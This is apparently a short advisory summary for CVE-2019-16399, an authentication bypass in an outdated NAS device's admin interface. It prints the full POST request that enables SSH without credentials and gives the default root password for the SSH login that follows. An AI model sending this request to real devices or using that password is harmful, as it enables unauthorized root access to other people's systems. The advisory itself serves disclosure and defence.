CVE-2019-16399

An attacker can access the `/admin/` directory without providing any credentials, exploiting a broken authentication vulnerability [ref_id=1]. From there, they can navigate to `/admin/system_advanced.php?lang=en` and submit a POST request to enable SSH [ref_id=1, ref_id=2]. This action allows an attacker to then log in via SSH using the default root password 'welc0me' [ref_id=1, ref_id=2].

The vulnerability lies within the administrative interface, specifically in the handling of requests to `/admin/system_advanced.php?lang=en` [ref_id=1, ref_id=2]. The system fails to properly authenticate users before allowing them to modify advanced system settings, such as enabling SSH access.

The advisory does not specify a patch or provide details on how the vulnerability is fixed. It recommends abandoning the affected NAS device and switching to newer hardware due to its outdated nature and the potential for further remote exploits [ref_id=1, ref_id=2].

POST /admin/system_advanced.php?lang=en HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 Content-Length: 241

orig_ssl_key=&orig_ssl_certificate=&submit_type=ssh&current_ssh=&enablessh=yes&Submit=Submit&ssl_certificate=Paste+a+signed+certificate+in+X.509+PEM+format+here.&ssl_key=Paste+a+RSA+private+key+in+PEM+format+here.&hddstandby=on&ledcontrol=on [ref_id=1, ref_id=2]